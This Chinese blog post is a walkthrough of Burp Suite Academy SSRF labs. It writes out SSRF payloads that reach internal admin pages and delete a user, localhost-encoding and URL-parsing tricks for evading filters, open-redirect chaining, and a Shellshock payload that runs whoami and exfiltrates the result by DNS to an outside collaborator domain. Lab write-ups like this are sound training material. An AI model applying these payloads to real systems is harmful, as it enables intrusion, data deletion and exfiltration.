burpsuite靶场——SSRF

最新推荐文章于 2024-06-25 15:48:54 发布
最新推荐文章于 2024-06-25 15:48:54 发布
阅读量1.4k 收藏 4
点赞数
分类专栏: 刷题 wp 文章标签: 前端 服务器 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61768489/article/details/128443295
版权

文章目录

针对本地服务器的基本 SSRF

image-20221222231512567

在商品下查看货物库存情况时抓包

image-20221223113359387

stockApi参数 ,来进行访问

根据目的修改成http://localhost/admin 是顺利访问到该页面的 ,也可以访问delete?username=carlos来删除这个用户

image-20221223113552987

为什么服务器会默认信任来自本地地址的请求呢,大概有如下原因

  • 访问控制策略可能编写于前端,我们修改请求包的时候是已经通过了前端的,所以很容易就被绕过了
  • 有的应用程序为了方便灾难恢复将服务器设置为任意用户都可访问,这就导致也会默认信任本地地址

针对另一个后端系统的基本 SSRF

image-20221223114035115

有的后端系统用户是无法直接访问的,但是服务器可以成功向其发送请求,所以如果利用ssrf同样可以向这些本不对用户开放的后端系统发出恶意请求。

同样的方式,不过需要对ip进行爆破

image-20221223114536223

image-20221223114703069

同样操作即可

SSRF 与基于黑名单的输入过滤器

最常见的黑名单哦,127.0.0.1和localhost等关键词有不少方法来绕

127.0.0.1绕过-进制转换
 
十进制 2130706433
 
八进制 017700000001
 
二进制 0b1111111000000000000000000000001 
十六进制 0x7f000001

http://localhost/       # localhost就是代指127.0.0.1
http://0/               # 0在window下代表0.0.0.0,而在liunx下代表127.0.0.1
http://[0:0:0:0:0:ffff:127.0.0.1]/    # 在liunx下可用,window测试了下不行
http://[::]:80/           # 在liunx下可用,window测试了下不行
http://127。0。0。1/       # 用中文句号绕过
http://①②⑦.⓪.⓪.①
http://127.1/
http://127.00000.00000.001/ # 0的数量多一点少一点都没影响,最后还是会指向127.0.0.1

admin用双重url编码即可

image-20221223122131260

基于白名单的输入过滤器的 SSRF

在@前加的内容都不会被解析成host的内容,而#或?后面的的内容也不会被解析到path中

url=http://ctf.@127.0.0.1/flag.php?show
image-20221223122847413

双 URL 编码#%2523

http://localhost:80%2523@stock.weliketoshop.net/admin/delete?username=carlos

SSRF 通过开放重定向漏洞绕过过滤器

image-20221223124404118

以上的尝试是不行的

image-20221223124714681

另一个功能点,查看下一个商品 ,会重定向到下一个商品

image-20221223124814272

可以利用这里的path参数进行重定向到指定的页面

image-20221223125407374

带外检测的盲 SSRF

与sql盲注相同,ssrf盲打最佳利用方式就是通过带外技术接收响应结果。也是同样使用burp自带的简易带外平台collaborator。即使有一些HTTP流量会被拦截,也会因为不怎么拦截DNS流量而获取我们想要的结果。
有的情况还可以利用SSRF盲打对目标后端系统进行探测,比如探测目标网络中开放的主机及端口之类的,这些同样也可以通过带外通道接收到。

image-20221223130311996

题目中直接告诉我们Referer头存在SSRF盲打漏洞

image-20221223164615443

image-20221223164641670

临时collaborator地址贴上去

image-20221223164710773

客户端接收到了发过来的DNS请求

image-20221223164923076

证明这里存在可以盲打的ssrf

利用 Shellshock 的盲 SSRF

image-20221223165905729

安装一下Collaborator Everywhere插件

image-20221223173432046

从名字就能看出来这个插件可以对每一个点都进行collaborator测试以发现可以使用带外技术发送请求的点,为了方便插件进行测试,我们将靶场地址添加到目标中

image-20221223174059058

然后开启网页代理,随意访问

image-20221223174336870

自动fuzz出一些存在的问题点referer和user-agent

题目给出了请用shellshock的payload进行ssrf盲打192.168.0.*:8080, 寻找Shellshock(CVE-2014-6271) 的payload

() { :; }; /usr/bin/nslookup $(whoami).BURP-COLLABORATOR-SUBDOMAIN

先用Burp Collaborator client创建个域名 替换BURP-COLLABORATOR-SUBDOMAIN

p8y574iqy5ac2it9il925s2vvm1cp1.oastify.com

image-20221223182733077

Collaborator client有回显出来 **peter-QB8oXF** 就是用户,说明whoami不仅执行成功了,还把执行结果附加在URL中向指定的collaborator客户端发送请求了

image-20221223182929507

ThnPkm
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【漏洞挖掘】——33、SSRF攻防对抗(中)
Fly_鹏程万里
06-06 28
有时候通过利用开放重定向漏洞可以规避任何类型的基于过滤器的防御,在前面的SSRF示例中假设用户提交的URL经过严格验证以防止恶意利用SSRF行为,但是允许其URL的应用程序包含一个开放重定向漏洞,如果用于后端HTTP请求的API支持重定向,那么您可以构造一个满足过滤器的URL并构造一个到所需后端目标的重定向请求,例如:应用程序包含一个开放重定向漏洞,其中以下URL。
【漏洞挖掘】——32、SSRF攻防对抗(上)
Fly_鹏程万里
03-22 4895
SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种由攻击者构造形成,由服务端发起请求的一个安全漏洞,产生的原因是由于服务端提供了从其他服务器应用获取数据的功能且没有对地址和协议等做过滤和限制,常见的一个场景就是通过用户输入的URL来获取图片,此功能如果被恶意使用就可以用存在缺陷的Web应用作为代理攻击远程和本地的服务器,这种形式的攻击称为服务端请求伪造攻击,SSRF攻击的目标是大多从外网无法访问的内部系统(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔
SSRF漏洞靶场
WINDY_PACE的博客
05-15 2784
对于SSRF,回显是能够成功利⽤的重要条件,所以过滤返回信息,验证远程服务器对请求的响应是⽐较容易的⽅法。如果WEB应⽤ 是去获取某⼀种类型的⽂件,那么在把返回结果展⽰给⽤户之前先验证返回的信息是否符合标准。 禁⽤不需要的协议,仅仅允许HTTP和HTTPS请求。可以防⽌类似于file://、gopher://、ftp://等引起的问题
burp靶场--ssrf
qq_33168924的博客
01-17 1702
服务器端请求伪造是一种 Web 安全漏洞,允许攻击者导致服务器端应用程序向非预期位置发出请求。在典型的 SSRF 攻击中,攻击者可能会导致服务器连接到组织基础设施内的仅供内部使用的服务。在其他情况下,他们可能能够强制服务器连接到任意外部系统。这可能会泄露敏感数据,例如授权凭据,或者代码执行。
Pikachu靶场--SSRF
最新发布
qq_65150735的博客
06-25 1111
Pikachu靶场--SSRF(服务器端请求伪造)
SSRF靶场
2301_80217595的博客
04-10 981
回到题目,在题目代码中一共对域名进行了两次请求,第一次是 gethostbyname 方法,第二次则是 file_get_contents 文件读取,可以通过 ceye.io 来实现攻击,DNS Rebinding 中设置两个 IP,一个是 127.0.0.1 另一个是随便可以访问的 IP。如果链接可以访问任意请求,则存在ssrf漏洞。要完成DNS重绑定攻击,我们需要一个域名,并且将这个域名的解析指定到我们自己的DNS Server,在我们的可控的DNS Server上编写解析服务,设置TTL时间为0。
SSRF综合靶场
hot_milk1的博客
02-20 1124
常见的SSRF的一些利用。
vuln-range之ssrf靶场
lionwerson的博客
03-31 572
1.开启靶机 提示用url传入参数进去,直接读出文件,完事。 ?url=file:///etc/passwd #注意三个斜杠
burpsuite安全练兵场-服务端3】目录遍历漏洞-6个实验(全)
xnxqwzy的博客
01-26 1019
blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。!blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。!
burpsuite安全练兵场-服务端1】SQL注入-17个实验(全)
wangluoanquan111的博客
01-26 1309
blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。!blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。!
BurpSuite Trick ALL In ONE (第一版)
jklbnm12的博客
10-12 928
BurpSuite 是一款Web安全研究人员、渗透测试人员和BugHunter的工具,在实际使用的时候一些小Trick将会帮助你更高效的使用这款工具,本文是在看到 Twitter上@sec_r0 开启的一个话题 #BurpHacksForBounties 之后基于他提到的一些trick进行扩展之后撰写的,在撰写的途中融合进了个人在使用BurpSuite时的一些trick和想法,也参考了众多文章,本篇为第一版,随后再有更多Trick的话会继续更新下一版。 BurpSuite Trick ALL In ONE
ssrf-king:用于burp的SSRF插件可在所有请求中自动进行SSRF检测
03-07
:fire: 自卫队 :fire: v1.12最新 burp的SSRF插件,可在所有请求中自动进行SSRF检测 如果您遇到任何问题或想要下面未列出的新功能,请在此表格中创建一个新的问题 即将发布的功能清单 :check_mark: 它将很快有一个用户界面来指定您自己的回叫有效负载 它将很快能够测试Json和XML 测试SMTP SSRF 如何安装/建造 git clone https://github.com/ethicalhackingplayground/ssrf-king gradle build 现在可以在build / libs下找到文件“ ssrf-king.jar”,然后可以将其导入Burpsuite。 另外,goto可以下载编译的文件。 特征 :check_mark: 测试所有外部交互的请求。 :check_mark: 检查是否有任何交互不是用户IP(如果有的话),它是一个开放的重定向。 :check_mark: 提醒用户任何外部交互,包括以下信息:
SSRF与靶场(史上最详细)
qq_34598847的博客
10-17 1169
SSRF漏洞介绍:SSRF漏洞(服务器端请求伪造):是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)。SSRF漏洞原理:SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。利用的是服务端的请求伪造。
ssrf+redis未授权靶场
actistsec的博客
10-25 2103
自己搭建不太合理的ssrf联动redis未授权
【技术分享】靶场--SSRF打内网服务
qq_53058639的博客
11-21 276
10. 此外,大家也可以写入计划任务,方法和写shell一样——利用gophers生成脚本,进行url解码,并添加auth后,再进行两次url编码即可。7. 将gopher://127.0.0.1:6379/_后面的payload进行url解码后,在上方添加验证密码并增加换行,然后进行两次url编码。5. 执行命令查看flag,这里提示flag在/tmp目录,但是查看后发现flag并不存在此处。5. 尝试读取/etc/shadow 和/root/.bash_histor,发现无权限。
burpsuit 靶场(Server-side request forgery)
wanan的博客
01-23 225
burpsuit 靶场(Server-side request forgery)
webug4.0靶场SSRF
0nc3的博客
06-26 1492
0x00 SSRF测试 简单测试一下,包括下列内容: 使用file协议获取 探测内网端口 进入靶场直接404?? 修改下URL的路径进入首页 0x01 使用file协议读取 使用file协议获取C盘的/Windows/win.ini的内容。 0x02 探测内网端口是否开放 测一下小蜜蜂虚拟机是否开放SSH服务 ...
【Burp入门第二十篇】使用BurpSuite实现SSRF+实战案例
等风来
04-07 609
允许用户输入一个URL,然后在服务器端通过发起HTTP请求来获取该URL的内容并显示给用户。如果网站没有对URL进行验证,通过输入。SSRF漏洞:向服务器发送伪造请求即可访问或操作服务器上的资源。,即可获取到内部系统的敏感信息,如管理员页面的内容。故我们可以尝试找到该服务器上存在的路径。以下步骤可证明某站点是否存在SSRF。故可证明该站点存在SSRF。【案例2】外带盲SSRF。
burpsuite靶场
09-14
Burp Suite靶场是一套用于测试和演示网络安全的目标应用程序集合。这个靶场旨在帮助安全专业人员在实践中提高他们的技能,并提供一个安全的环境来测试和演示各种攻击和漏洞利用技术。 在Burp Suite靶场中的客户端漏洞篇,主要涵盖了基于DOM的漏洞。DOM(Document Object Model)是一种用于处理HTML和XML文档的编程接口。基于DOM的漏洞是由于Web应用程序对用户提供的输入数据进行不充分或不正确的处理而引起的。这些漏洞可能导致跨站脚本攻击(XSS)和其他安全问题。 爆破当前数据库信息(--current-db)和爆破所有数据库信息(--dbs)是使用sqlmap工具的示例命令。sqlmap是一款专门用于检测和利用SQL注入漏洞的工具。通过提供目标URL和必要的参数,sqlmap可以自动扫描并利用可能存在的SQL注入漏洞。这些命令用于获取目标应用程序的数据库信息,从而了解目标系统的底层结构。 总之,通过Burp Suite靶场中的客户端漏洞篇和sqlmap工具的使用,安全专业人员可以更深入地了解和测试基于DOM的漏洞以及利用SQL注入漏洞获取数据库信息的技术。这些技术和知识对于安全评估和漏洞挖掘非常重要。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值